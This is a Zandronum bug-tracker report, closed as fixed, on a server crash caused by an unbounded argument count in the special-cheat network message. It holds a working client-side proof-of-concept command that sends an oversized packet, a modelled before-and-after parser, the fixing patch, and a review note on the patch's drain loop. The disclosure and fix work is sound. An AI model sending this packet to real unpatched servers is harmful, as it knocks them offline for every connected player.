ID | 0002694
Project | Zandronum
Category | [All Projects] Bug
View Status | public
Date Submitted | 2016-04-02 22:11
Last Update | 2018-09-30 22:33

Reporter | Dusk
Assigned To | Dusk
Priority | normal
Severity | exploit
Reproducibility | always
Status | closed
Resolution | fixed
Platform | (not set)
OS | (not set)
OS Version | (not set)
Product Version | 3.0-beta
Target Version | 3.0
Fixed in Version | (not set)

Summary | 0002694: Modified client can crash the server using the special cheat

Description | The server reads in special args and stores them in an array of 5... but can read in more than 5 args. This can be exploited to crash the server. Since this is done in network reading code, sv_cheats does not have to be enabled.
Steps To Reproduce

// Compiled into a modified Zandronum client; typing "crashserver" in the
// console sends one CLC_SPECIALCHEAT message whose argument count byte (10)
// is larger than the server's five-element args array. The server parses the
// message before any cheat check, so sv_cheats does not need to be enabled.
#include "c_dispatch.h"
CCMD (crashserver)
{
	// message type, cheat id, then the argument count
	NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, CLC_SPECIALCHEAT );
	NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
	NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 10 );
	// ten arguments, twice what args[5] on the server can hold
	for ( unsigned int i = 0; i < 10; ++i )
		NETWORK_WriteLong( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
}
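The unbounded read described in this report, modelled as an added example that is not Zandronum's own code: a stand-in ByteStream, the pre-patch logic that trusts the count byte as the loop bound over a five-element array, and the bounded parser from the attached patch with one extra check for a short read. The ByteStream wire layout (little-endian longs, -1 on a short read), the CLC_SPECIALCHEAT value, the cheat ids and the Verdict names are assumptions made for this example only.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

// Assumed constants: the page does not show the real CLC_SPECIALCHEAT value or
// the cheat ids, so these are placeholders for the example only.
static const uint8_t kClcSpecialCheat = 0x2A;
static const int kMaxArgs = 5;  // matches "int args[5]" in the patch

// Stand-in for the game's ByteStream (assumption: little-endian longs and a
// return value of -1 on a short read).
struct ByteStream {
    std::vector<uint8_t> data;
    size_t pos = 0;
    bool underflow = false;

    void writeByte(uint8_t b) { data.push_back(b); }
    void writeLong(int32_t v) {
        uint32_t u = static_cast<uint32_t>(v);
        for (int i = 0; i < 4; ++i) data.push_back(static_cast<uint8_t>(u >> (8 * i)));
    }
    int readByte() {
        if (pos >= data.size()) { underflow = true; return -1; }
        return data[pos++];
    }
    int32_t readLong() {
        if (data.size() - pos < 4) { underflow = true; pos = data.size(); return -1; }
        uint32_t u = 0;
        for (int i = 0; i < 4; ++i) u |= static_cast<uint32_t>(data[pos + i]) << (8 * i);
        pos += 4;
        return static_cast<int32_t>(u);
    }
};

// Pre-patch logic: the count byte is trusted and used as the loop bound over
// args[5]. Instead of corrupting memory, this reports how many of the stores
// "args[i] = NETWORK_ReadLong(...)" would land past the end of the array.
size_t unboundedStoresPastEnd(ByteStream& s) {
    s.readByte();  // cheat id, not needed here
    unsigned int argsSent = static_cast<unsigned int>(s.readByte());
    return argsSent > static_cast<unsigned int>(kMaxArgs) ? argsSent - kMaxArgs : 0;
}

enum class Verdict { Ok, Kick, Truncated };

struct SpecialCheat {
    int cheat = 0;
    int argCount = 0;
    int32_t args[kMaxArgs] = {0, 0, 0, 0, 0};
};

// Post-patch logic: reject counts larger than the array (the countof(args)
// check) and, as an extra check the patch does not show, refuse to use a count
// that came from a short read, so a negative readByte() result can never
// become a huge unsigned loop bound.
Verdict parseSpecialCheat(ByteStream& s, SpecialCheat& out) {
    int cheat = s.readByte();
    int argsSent = s.readByte();
    if (cheat < 0 || argsSent < 0) return Verdict::Truncated;
    if (argsSent > kMaxArgs) return Verdict::Kick;  // "Sent an invalid packet."
    out.cheat = cheat;
    out.argCount = argsSent;
    for (int i = 0; i < argsSent; ++i) out.args[i] = s.readLong();
    return s.underflow ? Verdict::Truncated : Verdict::Ok;
}

// Message dispatch: the first byte is the message type the PoC writes as
// CLC_SPECIALCHEAT. Anything else is treated as invalid here.
Verdict handleClientMessage(ByteStream& s, SpecialCheat& out) {
    if (s.readByte() != kClcSpecialCheat) return Verdict::Kick;
    return parseSpecialCheat(s, out);
}

// Builds a CLC_SPECIALCHEAT message (constructed input); count and longsWritten
// are independent so the count byte can lie about how many longs follow.
ByteStream buildPacket(uint8_t cheat, uint8_t count, size_t longsWritten, int32_t value) {
    ByteStream s;
    s.writeByte(kClcSpecialCheat);
    s.writeByte(cheat);
    s.writeByte(count);
    for (size_t i = 0; i < longsWritten; ++i) s.writeLong(value);
    return s;
}

// The packet from Steps To Reproduce: cheat 123, count 10, ten longs of 123.
ByteStream buildCrashPacket() { return buildPacket(123, 10, 10, 123); }

int main() {
    ByteStream before = buildCrashPacket();
    before.readByte();  // consume the message-type byte the dispatcher would read
    std::printf("pre-patch: %zu stores past the end of args[%d]\n",
                unboundedStoresPastEnd(before), kMaxArgs);

    SpecialCheat parsed;
    ByteStream after = buildCrashPacket();
    std::printf("post-patch verdict: %d (1 = kick)\n",
                static_cast<int>(handleClientMessage(after, parsed)));
    return 0;
}
```

Run against buildCrashPacket() the pre-patch model reports five stores past the end of args[5]; the post-patch parser kicks on the same bytes, and also rejects a packet whose count byte is within bounds but is not followed by that many longs, which is the case the patch's drain loop would otherwise read through silently.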
Attached Files | 2694-fix.diff (621 bytes) 2016-04-02 22:41

diff --git a/src/sv_main.cpp b/src/sv_main.cpp
--- a/src/sv_main.cpp
+++ b/src/sv_main.cpp
@@ -4597,6 +4597,16 @@
unsigned int argsSent = NETWORK_ReadByte( pByteStream );
int args[5] = { 0, 0, 0, 0, 0 };
+ // [TP] Ensure that the client does not send more than five arguments.
+ if ( argsSent > countof( args ))
+ {
+ for ( unsigned int i = 0; i < argsSent; ++i )
+ NETWORK_ReadLong( pByteStream );
+
+ SERVER_KickPlayer( g_lCurrentClient, "Sent an invalid packet." );
+ return true;
+ }
+
for ( unsigned int i = 0; i < argsSent; ++i )
args[i] = NETWORK_ReadLong( pByteStream );
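Review bot: the drain loop added before the kick, `for ( unsigned int i = 0; i < argsSent; ++i ) NETWORK_ReadLong( pByteStream );`, is still driven by the untrusted count; since `argsSent` is an `unsigned int` assigned straight from `NETWORK_ReadByte( pByteStream )`, if that call reports a short read with a negative value the count becomes roughly four billion and the loop spins that many times before `SERVER_KickPlayer` is reached. Consider checking for a short read before `argsSent` is used, capping the drain at 255 (the largest value a genuine byte can carry), or dropping the drain altogether since the handler returns immediately after the kick; if the remaining longs must be consumed to keep the rest of the packet in sync, say so in the `[TP]` comment. The `argsSent > countof( args )` comparison itself is the right bound and closes the out-of-bounds writes in the `args[i] = NETWORK_ReadLong( pByteStream );` loop below it.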